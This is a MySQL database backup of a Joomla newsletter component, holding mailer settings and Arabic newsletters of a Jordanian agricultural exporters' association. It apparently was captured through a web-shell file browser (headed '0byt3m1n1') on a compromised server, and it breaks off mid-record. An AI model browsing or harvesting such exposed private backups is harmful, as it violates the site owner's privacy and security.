0byt3m1n1
Path:
/
data
/
21
/
3
/
75
/
123
/
3564612
/
meta
/
3967998
/
mysql.backup
/
[
Home
]
File: fit.mysqlv103.bak.sql
-- MySQL dump 10.11 -- -- Host: mysqlv103 Database: fit -- ------------------------------------------------------ -- Server version 5.0.91 /*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */; /*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */; /*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */; /*!40101 SET NAMES utf8 */; /*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */; /*!40103 SET TIME_ZONE='+00:00' */; /*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */; /*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */; /*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */; /*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */; -- -- Table structure for table `bak_fit_bss_acymailing_config` -- DROP TABLE IF EXISTS `bak_fit_bss_acymailing_config`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_acymailing_config` ( `namekey` varchar(200) NOT NULL default '', `value` text, PRIMARY KEY (`namekey`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_acymailing_config` -- LOCK TABLES `bak_fit_bss_acymailing_config` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_acymailing_config` DISABLE KEYS */; INSERT INTO `bak_fit_bss_acymailing_config` VALUES ('level','Starter'),('version','3.0.0'),('from_name','joomla'),('from_email','a@a.com'),('reply_name','joomla'),('reply_email','a@a.com'),('bounce_email',''),('add_names','1'),('mailer_method','phpmail'),('encoding_format','8bit'),('charset','UTF-8'),('word_wrapping','150'),('hostname',''),('embed_images','0'),('embed_files','1'),('editor','0'),('multiple_part','1'),('sendmail_path','/usr/sbin/sendmail'),('smtp_host','192.168.1.10'),('smtp_port',''),('smtp_secured',''),('smtp_auth','0'),('smtp_username',''),('smtp_password',''),('smtp_keepalive','1'),('queue_nbmail','40'),('queue_nbmail_auto','70'),('queue_type','auto'),('queue_delay','3600'),('queue_try','3'),('queue_pause','120'),('allow_visitor','1'),('require_confirmation','0'),('priority_newsletter','3'),('allowedfiles','zip,doc,docx,pdf,xls,txt,gzip,rar,jpg,gif,xlsx,pps,csv,bmp,epg,ico,odg,odp,ods,odt,png,ppt,swf,xcf,mp3,wma'),('uploadfolder','media/com_acymailing/upload'),('confirm_redirect',''),('subscription_message','1'),('notification_unsuball',''),('cron_next','1251990901'),('confirmation_message','1'),('welcome_message','1'),('unsub_message','1'),('cron_last','0'),('cron_fromip',''),('cron_report',''),('cron_frequency','900'),('cron_sendreport','2'),('cron_sendto','a@a.com'),('cron_fullreport','1'),('cron_savereport','2'),('cron_savepath','media/com_acymailing/logs/report393980697.log'),('notification_created',''),('notification_accept',''),('notification_refuse',''),('forward','0'),('description_starter','Joomla!™ Marketing Campaign'),('description_essential','Joomla!™ Marketing Campaign'),('description_business','Joomla!™ Newsletter Extension'),('description_enterprise','Joomla!™ Mailing Extension'),('priority_followup','2'),('unsub_redirect',''),('show_footer','1'),('use_sef','0'),('itemid','0'),('css_module','default'),('css_frontend','default'),('css_backend','default'),('installcomplete','1'),('Starter','0'),('Essential','1'),('Business','2'),('Enterprise','3'),('smtp_com_username',''),('smtp_com_password',''),('elasticemail_username',''),('elasticemail_password',''),('dkim_domain',''),('dkim_selector',''),('dkim_private',''),('dkim_passphrase',''),('dkim_identity',''),('dkim_public',''),('bounce_action_maxtry','noaction'),('bounce_action_lists_maxtry','2'),('autosub','None'),('allow_modif','data'),('generate_name','1'),('notification_unsub',''),('sub_redirect',''),('modif_redirect',''),('unsubscription_message','1'),('confirm_message','0'),('menu_position','under'),('comments_feature',''),('frontend_subject','1'),('frontend_pdf','0'),('frontend_print','0'),('show_description','1'),('show_headings','0'),('show_senddate','1'),('show_filter','0'),('open_popup','0'),('popup_width','750'),('popup_height','550'),('unsub_intro','UNSUB_INTRO'),('unsub_dispoptions','1'),('unsub_survey','1'),('acyrss_format',''),('acyrss_name',''),('acyrss_description',''),('acyrss_element','20'),('acyrss_order','senddate'); /*!40000 ALTER TABLE `bak_fit_bss_acymailing_config` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_acymailing_fields` -- DROP TABLE IF EXISTS `bak_fit_bss_acymailing_fields`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_acymailing_fields` ( `fieldid` smallint(5) unsigned NOT NULL auto_increment, `fieldname` varchar(250) NOT NULL default '', `namekey` varchar(50) NOT NULL default '', `type` varchar(50) default NULL, `value` text NOT NULL, `published` tinyint(3) unsigned NOT NULL default '1', `ordering` smallint(5) unsigned default '99', `options` text, `core` tinyint(3) unsigned NOT NULL default '0', `required` tinyint(3) unsigned NOT NULL default '0', `backend` tinyint(3) unsigned NOT NULL default '1', `frontcomp` tinyint(3) unsigned NOT NULL default '0', `default` varchar(250) default NULL, `listing` tinyint(4) default NULL, PRIMARY KEY (`fieldid`), UNIQUE KEY `namekey` (`namekey`) ) ENGINE=MyISAM AUTO_INCREMENT=4 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_acymailing_fields` -- LOCK TABLES `bak_fit_bss_acymailing_fields` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_acymailing_fields` DISABLE KEYS */; INSERT INTO `bak_fit_bss_acymailing_fields` VALUES (1,'NAMECAPTION','name','text','',1,1,'',1,1,1,1,'',1),(2,'EMAILCAPTION','email','text','',1,2,'',1,1,1,1,'',1),(3,'RECEIVE','html','radio','0::JOOMEXT_TEXT\n1::HTML',1,3,'',1,1,1,1,'1',1); /*!40000 ALTER TABLE `bak_fit_bss_acymailing_fields` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_acymailing_filter` -- DROP TABLE IF EXISTS `bak_fit_bss_acymailing_filter`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_acymailing_filter` ( `filid` mediumint(8) unsigned NOT NULL auto_increment, `name` varchar(250) default NULL, `description` text, `published` tinyint(3) unsigned default NULL, `lasttime` int(10) unsigned default NULL, `trigger` text, `report` text, `action` text, `filter` text, PRIMARY KEY (`filid`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_acymailing_filter` -- LOCK TABLES `bak_fit_bss_acymailing_filter` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_acymailing_filter` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_acymailing_filter` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_acymailing_history` -- DROP TABLE IF EXISTS `bak_fit_bss_acymailing_history`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_acymailing_history` ( `subid` int(10) unsigned NOT NULL default '0', `date` int(10) unsigned NOT NULL default '0', `ip` varchar(50) default NULL, `action` varchar(50) NOT NULL default '' COMMENT 'different actions: created,modified,confirmed', `data` text, `source` text, `mailid` mediumint(8) unsigned default NULL, KEY `subid` (`subid`,`date`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_acymailing_history` -- LOCK TABLES `bak_fit_bss_acymailing_history` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_acymailing_history` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_acymailing_history` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_acymailing_list` -- DROP TABLE IF EXISTS `bak_fit_bss_acymailing_list`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_acymailing_list` ( `name` varchar(250) NOT NULL default '', `description` text, `ordering` smallint(10) unsigned default NULL, `listid` smallint(10) unsigned NOT NULL auto_increment, `published` tinyint(11) default NULL, `userid` int(10) unsigned default NULL, `alias` varchar(250) default NULL, `color` varchar(30) default NULL, `visible` tinyint(4) NOT NULL default '1', `welmailid` mediumint(11) default NULL, `unsubmailid` mediumint(11) default NULL, `type` enum('list','campaign') NOT NULL default 'list', `access_sub` varchar(250) default 'all', `access_manage` varchar(250) NOT NULL default 'none', `languages` varchar(250) NOT NULL default 'all', PRIMARY KEY (`listid`) ) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_acymailing_list` -- LOCK TABLES `bak_fit_bss_acymailing_list` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_acymailing_list` DISABLE KEYS */; INSERT INTO `bak_fit_bss_acymailing_list` VALUES ('Newsletters','Receive our latest news',2,1,1,62,'mailing_list','#3366ff',1,NULL,NULL,'list','all','none','all'),('نشرة الجمعية','',1,2,1,62,'-','#7A157D',1,NULL,0,'list','all','none','all'); /*!40000 ALTER TABLE `bak_fit_bss_acymailing_list` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_acymailing_listcampaign` -- DROP TABLE IF EXISTS `bak_fit_bss_acymailing_listcampaign`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_acymailing_listcampaign` ( `campaignid` smallint(10) unsigned NOT NULL default '0', `listid` smallint(10) unsigned NOT NULL default '0', PRIMARY KEY (`campaignid`,`listid`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_acymailing_listcampaign` -- LOCK TABLES `bak_fit_bss_acymailing_listcampaign` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_acymailing_listcampaign` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_acymailing_listcampaign` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_acymailing_listmail` -- DROP TABLE IF EXISTS `bak_fit_bss_acymailing_listmail`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_acymailing_listmail` ( `listid` int(10) unsigned NOT NULL default '0', `mailid` int(10) unsigned NOT NULL default '0', PRIMARY KEY (`listid`,`mailid`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_acymailing_listmail` -- LOCK TABLES `bak_fit_bss_acymailing_listmail` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_acymailing_listmail` DISABLE KEYS */; INSERT INTO `bak_fit_bss_acymailing_listmail` VALUES (1,10),(1,11),(1,12),(1,13),(2,14),(2,15),(2,16),(2,17); /*!40000 ALTER TABLE `bak_fit_bss_acymailing_listmail` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_acymailing_listsub` -- DROP TABLE IF EXISTS `bak_fit_bss_acymailing_listsub`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_acymailing_listsub` ( `listid` smallint(11) unsigned NOT NULL default '0', `subid` int(11) unsigned NOT NULL default '0', `subdate` int(11) unsigned default NULL, `unsubdate` int(11) unsigned default NULL, `status` tinyint(4) NOT NULL default '0', PRIMARY KEY (`listid`,`subid`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_acymailing_listsub` -- LOCK TABLES `bak_fit_bss_acymailing_listsub` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_acymailing_listsub` DISABLE KEYS */; INSERT INTO `bak_fit_bss_acymailing_listsub` VALUES (1,1,1322649203,NULL,1); /*!40000 ALTER TABLE `bak_fit_bss_acymailing_listsub` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_acymailing_mail` -- DROP TABLE IF EXISTS `bak_fit_bss_acymailing_mail`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_acymailing_mail` ( `mailid` mediumint(10) unsigned NOT NULL auto_increment, `subject` varchar(250) NOT NULL default '', `body` longtext NOT NULL, `altbody` longtext NOT NULL, `published` tinyint(4) default '1', `senddate` int(10) unsigned default NULL, `created` int(10) unsigned default NULL, `fromname` varchar(250) NOT NULL default '', `fromemail` varchar(250) NOT NULL default '', `replyname` varchar(250) NOT NULL default '', `replyemail` varchar(250) NOT NULL default '', `type` enum('news','autonews','followup','unsub','welcome','notification') NOT NULL default 'news', `visible` tinyint(4) NOT NULL default '1', `userid` int(10) unsigned default NULL, `alias` varchar(250) default NULL, `attach` text, `html` tinyint(4) NOT NULL default '1', `tempid` smallint(11) NOT NULL default '0', `key` varchar(200) default NULL, `frequency` varchar(50) default NULL, `params` text, `sentby` int(11) unsigned default NULL, `metakey` text, `metadesc` text, PRIMARY KEY (`mailid`), KEY `senddate` (`senddate`) ) ENGINE=MyISAM AUTO_INCREMENT=18 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_acymailing_mail` -- LOCK TABLES `bak_fit_bss_acymailing_mail` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_acymailing_mail` DISABLE KEYS */; INSERT INTO `bak_fit_bss_acymailing_mail` VALUES (1,'New Subscriber on your website','<p>Hello {subtag:name},</p><p>A new user has been created in AcyMailing : </p><blockquote><p>Name : {user:name}</p><p>Email : {user:email}</p><p>IP : {user:ip} </p><p>Subscription : {user:subscription}</p></blockquote>','',1,NULL,NULL,'','','','','notification',0,NULL,'notification_created',NULL,1,0,NULL,NULL,NULL,NULL,NULL,NULL),(2,'A User unsubscribed from all your lists','<p>Hello {subtag:name},</p><p>The user {user:name} : {user:email} unsubscribed from all your lists</p><p>Subscription : {user:subscription}</p><p>{survey}</p>','',1,NULL,NULL,'','','','','notification',0,NULL,'notification_unsuball',NULL,1,0,NULL,NULL,NULL,NULL,NULL,NULL),(3,'A User unsubscribed','<p>Hello {subtag:name},</p><p>The user {user:name} : {user:email} unsubscribed from your list</p><p>Subscription : {user:subscription}</p><p>{survey}</p>','',1,NULL,NULL,'','','','','notification',0,NULL,'notification_unsub',NULL,1,0,NULL,NULL,NULL,NULL,NULL,NULL),(4,'A User refuses to receive e-mails from your website','<p>The User {user:name} : {user:email} refuses to receive any e-mail anymore from your website.</p><p>Subscription : {user:subscription}</p><p>{survey}</p>','',1,NULL,NULL,'','','','','notification',0,NULL,'notification_refuse',NULL,1,0,NULL,NULL,NULL,NULL,NULL,NULL),(5,'{subtag:name}, please confirm your subscription','<p> Hello {subtag:name}, </p><p><strong>{confirm}Click here to confirm your subscription{/confirm}</strong></p>','',1,NULL,NULL,'','','','','notification',0,NULL,'confirmation',NULL,1,0,NULL,NULL,NULL,NULL,NULL,NULL),(6,'AcyMailing Cron Report','<p>{report}</p><p>{detailreport}</p>','',1,NULL,NULL,'','','','','notification',0,NULL,'report',NULL,1,0,NULL,NULL,NULL,NULL,NULL,NULL),(7,'A Newsletter has been generated : \"{subject}\"','<p>The Newsletter issue {issuenb} has been generated : </p><p>Subject : {subject}</p><p>{body}</p>','',1,NULL,NULL,'','','','','notification',0,NULL,'notification_autonews',NULL,1,0,NULL,NULL,NULL,NULL,NULL,NULL),(8,'Modify your subscription','<p>Hello {subtag:name}, </p><p>You requested some changes on your subscription,</p><p>Please {modify}click here{/modify} to be identified as the owner of this account and then modify your subscription.</p>','',1,NULL,NULL,'','','','','notification',0,NULL,'modif',NULL,1,0,NULL,NULL,NULL,NULL,NULL,NULL),(10,'JEPA\'s Newsletter 3 - 2009','<center> \r\n<table align=\"center\" cellpadding=\"0\" cellspacing=\"0\" width=\"95%\" style=\"background: #ffffff; border: 1px solid #cccccc;\">\r\n<tbody>\r\n<tr>\r\n<td width=\"15\"></td>\r\n<td>\r\n<div class=\"acymailing_content\">\r\n<h2 style=\"border-bottom: 6px solid #d3d09f; font-size: 16px; text-align: right;\">مشاركة الجمعية في معرض Fruit Logistica 2009</h2>\r\n<p dir=\"RTL\" style=\"text-align: right;\"><b>شارك اعضاء من الجمعية بتمويل من كل من مركز تطوير الأعمال والصادرات للشركات الأردنية ( تطوير) والممول من الوكالة الأمريكية للإنماء الدولي</b><b> والمؤسسة الأردنية لتطوير المشاريع الاقتصادية والمركز السويسري لترويج الصادرات </b><b> Sippo</b><b>في \"معرض </b><b>Fruit Logistic 2009</b><b>\" الذي أقيم في العاصمة الألمانية برلين خلال الفترة 4-6 شباط 2009.</b><b>.و</b><b>كان الهدف من المشاركة في هذا المعرض اطلاع المستوردين على جودة الخضار والفواكه الأردنية، وذلك لفتح أسواق جديدة لمنتجاتنا الزراعية، وقد كانت المشاركة مميزة من حيث ترتيب الجناح وعدد الزوار وحضور عدد من المستوردين اللذين أبدوا اهتماماً بالغاً بالمنتجات الأردنية عالية الجودة.</b><b>.</b></p>\r\n<br />\r\n<p style=\"font-size: 10px; margin-top: 0px;\"><a href=\"images/doc/news letter 1.2.3.doc\">إقرأ المزيد</a></p>\r\n</div>\r\n</td>\r\n<td width=\"15\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</center>','',1,NULL,1322668078,'','','','','news',1,62,'jepas-newsletter-3-2009',NULL,1,4,'1c1edd137667a0599b0b3d4c3d4c3124',NULL,NULL,NULL,'',''),(11,'JEPA\'s Newsletter 4 - 2009','<center> \r\n<table style=\"background: #ffffff; border: 1px solid #cccccc;\" width=\"95%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td width=\"15\"></td>\r\n<td>\r\n<div class=\"acymailing_content\">\r\n<h2 style=\"border-bottom: 6px solid #d3d09f; font-size: 16px; text-align: right;\">أخبار الجمعية</h2>\r\n<p dir=\"RTL\"><b>برعاية صاحبي الجلالة الملك عبد الله الثاني ابن الحسين المعظم والملكة رانيا العبد الله المعظمة </b><b>وضمن الرؤية الملكية للعام الحالي </b><b>2009</b><b> باعتباره عام للزراعة</b><b> </b><b>، أطلقت جلالتها ،وبمشاركة الجمعية ومختلف القطاعات الزراعية، البرنامج الوطني للزراعة العضوية في الأردن.وأكدت جلالتها على أن الزراعة العضوية تناسب الأردن لوجود نقص في الموارد المائية ومحدودية الأراضي الزراعية ، إضافة إلى إنتاج منتج زراعيا يعطي قيمة مضافة للأردن، وأضافت إلى انه يجب الاستفادة من الخبرات الدولية لبناء الخبرات المحلية</b><b>. </b><b>مشيرة إلى أن الهدف الأساسي في المجمل هو خدمة المزارع وتحسين وضعه المعيشي وبنفس الوقت توفير منتجات صحية للمواطنين</b><b>.</b><b></b></p>\r\n<p style=\"font-size: 10px; margin-top: 0px;\"><a href=\"images/doc/news letter 4,5,6.doc\">إقرأ المزيد</a></p>\r\n</div>\r\n</td>\r\n<td width=\"15\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</center>','',1,NULL,1322668418,'','','','','news',1,62,'jepas-newsletter-4-2009',NULL,1,3,'71eb64358c17ff86f3bae76c652567df',NULL,NULL,NULL,'',''),(12,'JEPA\'s Newsletter 2 - 2008','<center> \r\n<table align=\"center\" cellpadding=\"0\" cellspacing=\"0\" width=\"95%\" style=\"background: #ffffff; border: 1px solid #cccccc;\">\r\n<tbody>\r\n<tr>\r\n<td width=\"15\"></td>\r\n<td>\r\n<div class=\"acymailing_content\">\r\n<h2 style=\"border-bottom: 6px solid #d3d09f; font-size: 16px; text-align: right;\">المهندس أنور حداد يحصل على إجازة دولية في الإدارة</h2>\r\n<p style=\"text-align: right;\" dir=\"RTL\"><b>حصل المدير التنفيذي للجمعية المهندس أنور حداد على إجازة دولية في الإدارة </b><b>(Certified Manager)</b><b>.وهنأ السيد روبرت ريد المدير التنفيذي للجهة المانحة للشهادة ( </b><b>(ICPM</b><b> المهندس حداد على هذا الإنجاز وتتطلب هذه الشهادة تحمل مسئوليات هامة وهي:</b></p>\r\n<ul dir=\"RTL\">\r\n<li style=\"text-align: right;\"> <b>المحافظة على أعلى مستويات الإدارة وأدائها وذلك من خلال مبادئ الإدارة المتكاملة وتطبيقها لإنجاز العمل اليومي.</b><b> </b></li>\r\n<li style=\"text-align: right;\"><b>المحافظة على أخلاق المهنة طبقاً لمعايير وقواعد الجهة المانحة.</b><b> </b></li>\r\n<li style=\"text-align: right;\"><b>تطبيق خطة عمل ذات مستوى عالٍ من التطوير والاحتراف.</b><b> </b></li>\r\n</ul>\r\n<p dir=\"RTL\" style=\"text-align: right;\"><b><br /></b></p>\r\n<br />\r\n<p style=\"font-size: 10px; margin-top: 0px;\"><a href=\"images/doc/news letter 10.11.12.doc\">إقرأ المزيد</a></p>\r\n</div>\r\n</td>\r\n<td width=\"15\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</center>','',1,NULL,1322671213,'','','','','news',1,62,'jepas-newsletter-2-2008',NULL,1,4,'3f96780fb9ba578467cb22bbf4fcc989',NULL,NULL,NULL,'',''),(13,'JEPA\'s newsletter 1-2008','<center> \r\n<table align=\"center\" cellpadding=\"0\" cellspacing=\"0\" width=\"95%\" style=\"background: #ffffff; border: 1px solid #cccccc;\">\r\n<tbody>\r\n<tr>\r\n<td width=\"15\"></td>\r\n<td>\r\n<div class=\"acymailing_content\">\r\n<h2 style=\"border-bottom: 6px solid #d3d09f; font-size: 16px; text-align: right;\">أخبار الجمعية</h2>\r\n<div>\r\n<p dir=\"RTL\"><b>عقدت الجمعية دورة تدريبية في مجال شهادات المطابقة الزراعية (</b><b>JEPA) بالتعاون مع برنامج التنمية الاقتصادية \"سابق\" الممول من الوكالة الأمريكية للتنمية الدولية حيث استقدمت خبير دولي في مجال شهادات المطابقة الدولية الخاصة بالقطاع الزراعي, وذلك لتأهيل كوادرها وكوادر جهات وطنية أخرى لتجهيز وإعداد المزارع الأردنية ومحطات التعبئة والتدريج للحصول على شهادات ال¯ </b><b>Global Gap و</b><b>HACCPوبلغ عدد المتدربين احد عشر متدربا من المركز الوطني للبحث والإرشاد الزراعي, ووزارة الزراعة, وأمانة عمان, ونقابة المهندسين الزراعيين, والمؤسسة العامة للغذاء والدواء إضافة إلى كوادر </b><b> </b></p>\r\n<p dir=\"RTL\"><b>الجمعية. حيث تلقى المتدربون تدريبا مكثفا نظريا وميدانيا في عدد من المزارع في نفس المجال المذكور.ويذكر أن أغلب الدول الأوروبية أصبحت تطلب هذه الشهادات كمتطلب أساسي للتصدير ولدخول المنتجات الزراعية, وبدونها قد تتعرض المنتجات للتوقيف والفحص.وعليه فقد أصبحت كوادر الجمعية متمكنة من تأهيل المحاصيل الزراعية الأردنية ومحطات التعبئة والتدريج والمستودعات للحصول على هذه الشهادة التي تحقق قيمة مضافة للمنتجات الأردنية. </b></p>\r\n</div>\r\n<br />\r\n<p style=\"font-size: 10px; margin-top: 0px;\"><a href=\"images/doc/s newsletter 1-2008_1.doc\">إقرأ المزيد</a></p>\r\n</div>\r\n</td>\r\n<td width=\"15\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</center>','',1,NULL,1322671548,'','','','','news',1,62,'jepas-newsletter-1-2008',NULL,1,4,'210f447a1109944b251e8af6a91ab817',NULL,NULL,NULL,'',''),(14,'النشرة الدورية الأولى-2008','<center> \r\n<table align=\"center\" cellpadding=\"0\" cellspacing=\"0\" width=\"95%\" style=\"background: #ffffff; border: 1px solid #cccccc;\">\r\n<tbody>\r\n<tr>\r\n<td width=\"15\"></td>\r\n<td>\r\n<div class=\"acymailing_content\">\r\n<h2 style=\"border-bottom: 6px solid #d3d09f; font-size: 16px; text-align: right;\">أخبار الجمعية</h2>\r\n<div>\r\n<p dir=\"RTL\"><b>عقدت الجمعية دورة تدريبية في مجال شهادات المطابقة الزراعية (</b><b>JEPA) بالتعاون مع برنامج التنمية الاقتصادية \"سابق\" الممول من الوكالة الأمريكية للتنمية الدولية حيث استقدمت خبير دولي في مجال شهادات المطابقة الدولية الخاصة بالقطاع الزراعي, وذلك لتأهيل كوادرها وكوادر جهات وطنية أخرى لتجهيز وإعداد المزارع الأردنية ومحطات التعبئة والتدريج للحصول على شهادات ال¯ </b><b>Global Gap و</b><b>HACCPوبلغ عدد المتدربين احد عشر متدربا من المركز الوطني للبحث والإرشاد الزراعي, ووزارة الزراعة, وأمانة عمان, ونقابة المهندسين الزراعيين, والمؤسسة العامة للغذاء والدواء إضافة إلى كوادر </b><b> </b></p>\r\n<p dir=\"RTL\"><b>الجمعية. حيث تلقى المتدربون تدريبا مكثفا نظريا وميدانيا في عدد من المزارع في نفس المجال المذكور.ويذكر أن أغلب الدول الأوروبية أصبحت تطلب هذه الشهادات كمتطلب أساسي للتصدير ولدخول المنتجات الزراعية, وبدونها قد تتعرض المنتجات للتوقيف والفحص.وعليه فقد أصبحت كوادر الجمعية متمكنة من تأهيل المحاصيل الزراعية الأردنية ومحطات التعبئة والتدريج والمستودعات للحصول على هذه الشهادة التي تحقق قيمة مضافة للمنتجات الأردنية. </b></p>\r\n</div>\r\n<br />\r\n<p style=\"font-size: 10px; margin-top: 0px;\"><a href=\"images/doc/s newsletter 1-2008_1.doc\">إقرأ المزيد</a></p>\r\n</div>\r\n</td>\r\n<td width=\"15\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</center>','',1,NULL,1322988205,'','','','','news',1,62,'jepas-newsletter-1-2008',NULL,1,4,'a9836ba478550a1e6ffe8a013a8a0a4b',NULL,NULL,NULL,'',''),(15,'النشرة الدورية الثانية-2008','<center> \r\n<table align=\"center\" cellpadding=\"0\" cellspacing=\"0\" width=\"95%\" style=\"background: #ffffff; border: 1px solid #cccccc;\">\r\n<tbody>\r\n<tr>\r\n<td width=\"15\"></td>\r\n<td>\r\n<div class=\"acymailing_content\">\r\n<h2 style=\"border-bottom: 6px solid #d3d09f; font-size: 16px; text-align: right;\">المهندس أنور حداد يحصل على إجازة دولية في الإدارة</h2>\r\n<p style=\"text-align: right;\" dir=\"RTL\"><b>حصل المدير التنفيذي للجمعية المهندس أنور حداد على إجازة دولية في الإدارة </b><b>(Certified Manager)</b><b>.وهنأ السيد روبرت ريد المدير التنفيذي للجهة المانحة للشهادة ( </b><b>(ICPM</b><b> المهندس حداد على هذا الإنجاز وتتطلب هذه الشهادة تحمل مسئوليات هامة وهي:</b></p>\r\n<ul dir=\"RTL\">\r\n<li style=\"text-align: right;\"> <b>المحافظة على أعلى مستويات الإدارة وأدائها وذلك من خلال مبادئ الإدارة المتكاملة وتطبيقها لإنجاز العمل اليومي.</b><b> </b></li>\r\n<li style=\"text-align: right;\"><b>المحافظة على أخلاق المهنة طبقاً لمعايير وقواعد الجهة المانحة.</b><b> </b></li>\r\n<li style=\"text-align: right;\"><b>تطبيق خطة عمل ذات مستوى عالٍ من التطوير والاحتراف.</b><b> </b></li>\r\n</ul>\r\n<p dir=\"RTL\" style=\"text-align: right;\"><b><br /></b></p>\r\n<br />\r\n<p style=\"font-size: 10px; margin-top: 0px;\"><a href=\"images/doc/news letter 10.11.12.doc\">إقرأ المزيد</a></p>\r\n</div>\r\n</td>\r\n<td width=\"15\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</center>','',1,NULL,1322988205,'','','','','news',1,62,'jepas-newsletter-2-2008',NULL,1,4,'fdf356fad1a34cff33c620ef0dd70173',NULL,NULL,NULL,'',''),(16,'النشرة الدورية الرابعة - 2009','<center> \r\n<table style=\"background: #ffffff; border: 1px solid #cccccc;\" width=\"95%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td width=\"15\"></td>\r\n<td>\r\n<div class=\"acymailing_content\">\r\n<h2 style=\"border-bottom: 6px solid #d3d09f; font-size: 16px; text-align: right;\">أخبار الجمعية</h2>\r\n<p dir=\"RTL\"><b>برعاية صاحبي الجلالة الملك عبد الله الثاني ابن الحسين المعظم والملكة رانيا العبد الله المعظمة </b><b>وضمن الرؤية الملكية للعام الحالي </b><b>2009</b><b> باعتباره عام للزراعة</b><b> </b><b>، أطلقت جلالتها ،وبمشاركة الجمعية ومختلف القطاعات الزراعية، البرنامج الوطني للزراعة العضوية في الأردن.وأكدت جلالتها على أن الزراعة العضوية تناسب الأردن لوجود نقص في الموارد المائية ومحدودية الأراضي الزراعية ، إضافة إلى إنتاج منتج زراعيا يعطي قيمة مضافة للأردن، وأضافت إلى انه يجب الاستفادة من الخبرات الدولية لبناء الخبرات المحلية</b><b>. </b><b>مشيرة إلى أن الهدف الأساسي في المجمل هو خدمة المزارع وتحسين وضعه المعيشي وبنفس الوقت توفير منتجات صحية للمواطنين</b><b>.</b><b></b></p>\r\n<p style=\"font-size: 10px; margin-top: 0px;\"><a href=\"images/doc/news letter 4,5,6.doc\">إقرأ المزيد</a></p>\r\n</div>\r\n</td>\r\n<td width=\"15\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</center>','',1,NULL,1322988205,'','','','','news',1,62,'jepas-newsletter-4-2009',NULL,1,3,'4012a02564191b1e75dc8dac006b9d82',NULL,NULL,NULL,'',''),(17,'النشرة الدورية الثالثة - 2009','<center> \r\n<table align=\"center\" cellpadding=\"0\" cellspacing=\"0\" width=\"95%\" style=\"background: #ffffff; border: 1px solid 